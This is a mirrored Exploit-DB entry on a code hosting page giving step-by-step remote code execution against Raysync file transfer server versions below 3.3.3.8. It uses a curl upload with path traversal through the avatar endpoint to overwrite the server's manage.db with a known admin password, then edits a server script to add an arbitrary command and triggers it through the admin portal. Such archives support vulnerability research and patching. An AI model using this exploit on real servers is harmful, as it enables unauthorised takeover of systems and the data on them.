bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/webapps/49265.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
691 B
Text
Raw Permalink Blame History

# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux
step1: run RaysyncServer.sh to build a web application on the local
environment, set admin password to 123456 , which will be write to
manage.db file.
step2: curl "file=@manage.db" http://[raysync
ip]/avatar?account=1&UserId=/../../../../config/manager.db
to override remote manage.db file in server.
step3: login in admin portal with admin/123456.
step4: create a normal file with all permissions in scope.
step5: modify RaySyncServer.sh ,add arbitrary evil command.
step6: trigger rce with clicking "reset" button
Reference in a new issue View git blame Copy permalink